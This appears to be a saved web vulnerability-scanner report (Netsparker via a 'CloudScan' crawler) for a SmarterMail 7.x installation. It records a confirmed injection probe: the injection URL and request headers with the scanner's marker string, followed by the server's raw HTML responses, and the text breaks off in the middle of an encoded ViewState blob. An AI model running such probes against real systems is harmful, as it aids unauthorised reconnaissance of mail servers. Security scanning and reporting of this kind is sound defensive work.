<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></..
- /UserControls/Popups/frmDeviceSync.aspx

/UserControls/Popups/frmDeviceSync.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2)

Injection Request

GET /frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2) HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/Alerts/frmAlert.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 02:42:31 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2332
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fMain%2fAlerts%2ffrmAlert.aspx%2f%22ns%3d%22netsparker(0x0038D2)" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAVSJiN4MkY7TWFpbiYjeDJGO0FsZXJ0cyYjeDJGO2ZybUFsZXJ0LmFzcHgmI3gyRjsmcXVvdDtucz0mcXVvdDtuZXRzcGFya2VyKDB4MDAzOEQyKWRkAgcPDxYCHwMFI1BhZ2Ugbm90IGZvdW5kIG9yIHVua25vd24gZXhjZXB0aW9uZGRkhR1wEqGoaoye4+rEy/25HTG4hDw=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;Main&#x2F;Alerts&#x2F;frmAlert.aspx&#x2F;&quot;ns=&quot;netsparker(0x0038D2)</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError">Page not found or unknown exception</span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>



<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:57:15 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 327169
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
Synchronization Center
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmDeviceSync.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIHD2QWAmYPZBYCAgEPFgIeB1Zpc2libGVoFgICAQ8WAh4EVGV4dGVkAgsPZBYEAgEPZBYCAgMPFgIfAwUHTWVzc2FnZWQCAw9kFgYCAg9kFgICAQ9kFgQCAQ9kFgICAQ9kFg4CAw9kFgRmDw8WAh8DBQ1pUG9kIC8gaVBob25lZGQCAQ8PFgIeCEltYWdlVXJsBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9hcHBsZS5wbmdkZAIED2QWBGYPDxYCHwMFBGlQYWRkZAIBDw8WAh8EBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9hcHBsZS5wbmdkZAIFD2QWBGYPDxYCHwMFCkJsYWNrQmVycnlkZAIBDw8WAh8EBUFodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9ibGFja2JlcnJ5LnBuZ2RkAgYPZBYEZg8PFgIfAwUHQW5kcm9pZGRkAgEPDxYCHwQFPGh0dHA6Ly9pbWFnZXMuc21hcnRlcnRvb2xzLmNvbS9zbWFydGVybWFpbC92Ny9pY29uX2Ryb2lkLnBuZ2RkAgcPZBYEZg8PFgIfAwUOV2luZG93cyBNb2JpbGVkZAIBDw8WAh8EBT5odHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl93aW5kb3dzLnBuZ2RkAggPZBYEZg8PFgIfAwUFTm9raWFkZAIBDw8WAh8EBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9ub2tpYS5wbmdkZAIJD2QWBGYPDxYCHwMFBFBhbG1kZAIBDw8WAh8EBTtodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9wYWxtLnBuZ2RkAgMPZBYCAgEPZBYCZg9kFgICAQ8WAh8DBf8aPGRpdiBjbGFzcz0nRGV2aWNlV3JhcHBlcic+PGRpdiBjbGFzcz0nRGV2aWNlTmFtZSc+QXBwbGUgaVBvZCBhbmQgaVBob25lPC9kaXY+PGRpdiBjbGFzcz0nRGV2aWNlRGVzY3JpcHRpb24nPlRoZSBBcHBsZSBpUG9kIGlzIGEgcG9ydGFibGUgbWVkaWEgcGxheWVyLiBEZXBlbmRpbmcgb24gdGhlIG1vZGVsLCB0aGUgaVBvZCBtYXkgaGF2ZSB2aWRlbywgdG91Y2gtc2NyZWVuLCBhbmQvb3IgSW50ZXJuZXQgY2FwYWJpbGl0aWVzLiBUaGUgQXBwbGUgaVBob25lIGlzIGEgR1NNIGNlbGwgcGhvbmUgdGhhdCdzIGFsc28gYW4gaVBvZCwgYSB2aWRlbyBjYW1lcmEsIGFuZCBhIG1vYmlsZSBJbnRlcm5ldCBkZXZpY2Ugd2l0aCBlbWFpbCBhbmQgR1BTIG1hcHMuIEZvciBtb3JlIGluZm9ybWF0aW9uIG9uIHRoZXNlIGRldmljZXMsIHZpc2l0IDxhIGhyZWY9Imh0dHA6Ly93d3cuYXBwbGUuY29tICIgdGFyZ2V0PSJfYmxhbmsiPnd3dy5hcHBsZS5jb208L2E+LjwvZGl2PjxkaXYgY2xhc3M9J0RldmljZUNhcGFiaWxpdGllcyc+U3luY2hyb25pemVzOiBBcHBvaW50bWVudHMsIENvbnRhY3RzLCBF
bWFpbCwgVGFza3M8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFdyYXBwZXInPjxkaXYgY2xhc3M9J1Byb3RvY29sTmFtZSc+TWljcm9zb2Z0IEV4Y2hhbmdlIEFjdGl2ZVN5bmM8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5NaWNyb3NvZnQgRXhjaGFuZ2UgQWN0aXZlU3luYyBpcyBhbiBvcHRpb25hbCBhZGQtb24gdGhhdCBzeW5jcyBTbWFydGVyTWFpbCBtYWlsYm94ZXMgd2l0aCBtb3N0IG1vYmlsZSBkZXZpY2VzIGFuZCBzbWFydHBob25lcy4gVGhlIEV4Y2hhbmdlIEFjdGl2ZVN5bmMgYWRkLW9uIGlzIHRoZSBvbmx5IHN5bmNocm9uaXphdGlvbiBtZXRob2QgdGhhdCB1c2VzIGRpcmVjdCBwdXNoIHRlY2hub2xvZ3kgdG8gc3luYyBjb2xsYWJvcmF0aW9uIGl0ZW1zIGluIHJlYWwgdGltZSwgZW5zdXJpbmcgYW55IGNoYW5nZXMgYXJlIGF1dG9tYXRpY2FsbHkgcmVjb3JkZWQgaW4gYm90aCBTbWFydGVyTWFpbCBhbmQgdGhlIG1vYmlsZSBkZXZpY2UuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+VXNpbmcgdGhlIEV4Y2hhbmdlIEFjdGl2ZVN5bmMgYWRkLW9uLCB5b3UgY2FuIHN5bmMgdGhlIGZvbGxvd2luZyBjb2xsYWJvcmF0aW9uIGl0ZW1zIHdpdGggdGhlIGlQb2QvaVBob25lOiBlbWFpbCwgY2FsZW5kYXJzLCBhbmQgY29udGFjdHMuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xTdGF0dXMnPk1pY3Jvc29mdCBFeGNoYW5nZSBBY3RpdmVTeW5jIGlzIG5vdCBjdXJyZW50bHkgZW5hYmxlZCBmb3IgeW91ciBhY2NvdW50LjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5TeW5jTUw8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5TeW5jTUwgaXMgYSBwbGF0Zm9ybS1pbmRlcGVuZGVudCBzeW5jaHJvbml6YXRpb24gc3RhbmRhcmQgdGhhdCBzeW5jcyBTbWFydGVyTWFpbCBtYWlsYm94ZXMgd2l0aCBPdXRsb29rLCBUaHVuZGVyYmlyZCwgYW5kIG1vc3QgbW9iaWxlIGRldmljZXMuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+VXNpbmcgdGhlIFN5bmNNTCBwcm90b2NvbCwgeW91IGNhbiBzeW5jIHRoZSBmb2xsb3dpbmcgY29sbGFib3JhdGlvbiBpdGVtcyB3aXRoIHRoZSBpUG9kL2lQaG9uZTogY29udGFjdHMsIGNhbGVuZGFycywgYW5kIHRhc2tzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz5TeW5jTUwgaXMgZW5hYmxlZCBmb3IgeW91ciBhY2NvdW50LjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5DYXJkREFWPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+Q2FyZERBViBpcyBhbiBleHRlbnNpb24gb2YgdGhlIFdlYkRBViBwcm90b2NvbCB0aGF0IHN5bmNzIFNtYXJ0ZXJNYWlsIGNvbnRhY3RzIHdpdGggTWFjcywgaVBhZHMsIGlQaG9uZXMsIGFuZCBvdGhlciBk
ZXZpY2VzL2FwcGxpY2F0aW9ucyB0aGF0IHVzZSB0aGUgdGVjaG5vbG9neS48L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5Vc2luZyB0aGUgQ2FyZERBViBwcm90b2NvbCwgeW91IGNhbiBzeW5jIHRoZSBmb2xsb3dpbmcgY29sbGFib3JhdGlvbiBpdGVtcyB3aXRoIHRoZSBpUG9kL2lQaG9uZTogY29udGFjdHMuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xTdGF0dXMnPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5DYWxEQVY8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5DYWxEQVYgaXMgYW4gZXh0ZW5zaW9uIG9mIHRoZSBXZWJEQVYgcHJvdG9jb2wgdGhhdCBzeW5jcyBTbWFydGVyTWFpbCBjYWxlbmRhcnMgd2l0aCBNYWNzLCBpUGFkcywgaVBob25lcywgVGh1bmRlcmJpcmQgYW5kIG90aGVyIGRldmljZXMvYXBwbGljYXRpb25zIHRoYXQgdXNlIHRoZSB0ZWNobm9sb2d5LjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIHRoZSBDYWxEQVYgcHJvdG9jb2wsIHlvdSBjYW4gc3luYyB0aGUgZm9sbG93aW5nIGNvbGxhYm9yYXRpb24gaXRlbXMgd2l0aCB0aGUgaVBvZC9pUGhvbmU6IGNhbGVuZGFycy48L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFN0YXR1cyc+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xXcmFwcGVyJz48ZGl2IGNsYXNzPSdQcm90b2NvbE5hbWUnPkFkZGl0aW9uYWwgSW5mb3JtYXRpb248L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5Gb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBzeW5jaHJvbml6aW5nIFNtYXJ0ZXJNYWlsIHdpdGggbW9iaWxlIGRldmljZXMgYW5kIGFwcGxpY2F0aW9ucywgcGxlYXNlIHJlZmVyIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vZG93bmxvYWRzL2RvY3VtZW50cy9zbWFydGVybWFpbC9zbWFydGVybWFpbF9zeW5jaHJvbml6YXRpb25fY29sbGFib3JhdGlvbi5wZGYiIHRhcmdldCA9Il9ibGFuayI+U3luY2hyb25pemluZyB3aXRoIFNtYXJ0ZXJNYWlsPC9hPiB3aGl0ZSBwYXBlci4gU3RlcC1ieS1zdGVwIGluc3RydWN0aW9ucyBmb3Igc3luY2hyb25pemluZyBhIHNwZWNpZmljIGRldmljZSBtYXkgYWxzbyBiZSBhdmFpbGFibGUgaW4gdGhlIDxhIGhyZWY9Imh0dHA6Ly9wb3J0YWwuc21hcnRlcnRvb2xzLmNvbS9LQi9jOTYvaG93LXRvLmFzcHgiIHRhcmdldD0iX2JsYW5rIj5TbWFydGVyVG9vbHMgS25vd2xlZGdlIEJhc2U8L2E+LjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz48L2Rpdj48L2Rpdj48L2Rpdj5kAgQPZBYCAgEPZBYEAgEPZBYCAgEPZBYIAgMPZBYEZg8PFgIfAwUHT3V0bG9va2RkAgEPDxYCHwQFPmh0dHA6Ly9pbWFnZXMuc21hcnRlcnRvb2xzLmNvbS9zbWFydGVybWFpbC92Ny9p
Y29uX291dGxvb2sucG5nZGQCBA9kFgRmDw8WAh8DBQtUaHVuZGVyYmlyZGRkAgEPDxYCHwQFQmh0dHA6Ly9pbWFnZXMuc21hcnRlcnRvb2xzLmNvbS9zbWFydGVybWFpbC92Ny9pY29uX3RodW5kZXJiaXJkLnBuZ2RkAgUPZBYEZg8PFgIfAwUMQWRkcmVzcyBCb29rZGQCAQ8PFgIfBAVCaHR0cDovL2ltYWdlcy5zbWFydGVydG9vbHMuY29tL3NtYXJ0ZXJtYWlsL3Y3L2ljb25fYWRkcmVzc2Jvb2sucG5nZGQCBg9kFgRmDw8WAh8DBQRpQ2FsZGQCAQ8PFgIfBAU7aHR0cDovL2ltYWdlcy5zbWFydGVydG9vbHMuY29tL3NtYXJ0ZXJtYWlsL3Y3L2ljb25faWNhbC5wbmdkZAIDD2QWAgIBD2QWAmYPZBYCAgEPFgIfAwWfFTxkaXYgY2xhc3M9J0RldmljZVdyYXBwZXInPjxkaXYgY2xhc3M9J0RldmljZU5hbWUnPk1pY3Jvc29mdCBPdXRsb29rPC9kaXY+PGRpdiBjbGFzcz0nRGV2aWNlRGVzY3JpcHRpb24nPk1pY3Jvc29mdCBPdXRsb29rIGlzIGFuIGVtYWlsIGNsaWVudCBkZXZlbG9wZWQgYnkgTWljcm9zb2Z0IEluYy4gZm9yIG1hbmFnaW5nIG1lc3NhZ2VzLCBjb250YWN0cywgYW5kIGFwcG9pbnRtZW50cyBhbmQgaXMgY29tbW9ubHkgZGlzdHJpYnV0ZWQgYXMgcGFydCBvZiB0aGUgTWljcm9zb2Z0IE9mZmljZSBzdWl0ZS4gRm9yIG1vcmUgaW5mb3JtYXRpb24sIHZpc2l0IDxhIGhyZWY9Imh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9vdXRsb29rIiB0YXJnZXQ9Il9ibGFuayI+d3d3Lm1pY3Jvc29mdC5jb20vb3V0bG9vazwvYT4uPC9kaXY+PGRpdiBjbGFzcz0nRGV2aWNlQ2FwYWJpbGl0aWVzJz5TeW5jaHJvbml6ZXM6IEFwcG9pbnRtZW50cywgQ29udGFjdHMsIE5vdGVzLCBFbWFpbCwgVGFza3M8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFdyYXBwZXInPjxkaXYgY2xhc3M9J1Byb3RvY29sTmFtZSc+U3luY01MPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+U3luY01MIGlzIGEgcGxhdGZvcm0taW5kZXBlbmRlbnQgc3luY2hyb25pemF0aW9uIHN0YW5kYXJkIHRoYXQgc3luY3MgU21hcnRlck1haWwgbWFpbGJveGVzIHdpdGggT3V0bG9vaywgVGh1bmRlcmJpcmQsIGFuZCBtb3N0IG1vYmlsZSBkZXZpY2VzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIHRoZSBTeW5jTUwgcHJvdG9jb2wsIHlvdSBjYW4gc3luYyB0aGUgZm9sbG93aW5nIGNvbGxhYm9yYXRpb24gaXRlbXMgd2l0aCBPdXRsb29rOiBjb250YWN0cywgY2FsZW5kYXJzLCB0YXNrcywgYW5kIG5vdGVzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz5TeW5jTUwgaXMgZW5hYmxlZCBmb3IgeW91ciBhY2NvdW50LjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5BZGQgdG8gT3V0bG9vazwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlRoZSBBZGQgdG8gT3V0bG9vayBmZWF0dXJlIHdpdGhpbiB0aGUgU21hcnRlck1haWwg
d2VibWFpbCBpbnRlcmZhY2UgdXNlcyB0d28td2F5IHN5bmNocm9uaXphdGlvbiB0ZWNobm9sb2d5IHRvIHN5bmMgYSBTbWFydGVyTWFpbCBtYWlsYm94IHdpdGggT3V0bG9vayAyMDA3IGFuZCBwcm92aWRlcyByZWFkLW9ubHkgY2FwYWJpbGl0eSBmb3IgT3V0bG9vayAyMDAzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIEFkZCB0byBPdXRsb29rLCB5b3UgY2FuIHN5bmMgdGhlIGZvbGxvd2luZyBjb2xsYWJvcmF0aW9uIGl0ZW1zOiBjYWxlbmRhcnMsIGNvbnRhY3RzLCBhbmQgdGFza3MuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xTdGF0dXMnPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5TbWFydGVyTWFpbCBTeW5jPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+U21hcnRlck1haWwgU3luYyBpcyBhIGRlc2t0b3AgdXRpbGl0eSBkZXZlbG9wZWQgYnkgU21hcnRlclRvb2xzIHRoYXQgYWxsb3dzIHlvdSB0byBxdWlja2x5IGFuZCBlYXNpbHkgc3luY2hyb25pemUgeW91ciBjYWxlbmRhcnMsIGNvbnRhY3RzLCB0YXNrcywgYW5kIG5vdGVzIHdpdGggTWljcm9zb2Z0IE91dGxvb2sgYW5kIFdpbmRvd3MgUGhvbmVzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIHRoZSBTbWFydGVyTWFpbCBTeW5jIHByb3RvY29sLCB5b3UgY2FuIHN5bmMgdGhlIGZvbGxvd2luZyBjb2xsYWJvcmF0aW9uIGl0ZW1zIHdpdGggT3V0bG9vazogY29udGFjdHMsIGNhbGVuZGFycywgdGFza3MsIGFuZCBub3Rlcy48L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFN0YXR1cyc+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xXcmFwcGVyJz48ZGl2IGNsYXNzPSdQcm90b2NvbE5hbWUnPkFkZGl0aW9uYWwgSW5mb3JtYXRpb248L2Rpdj48ZGl2IGNsYXN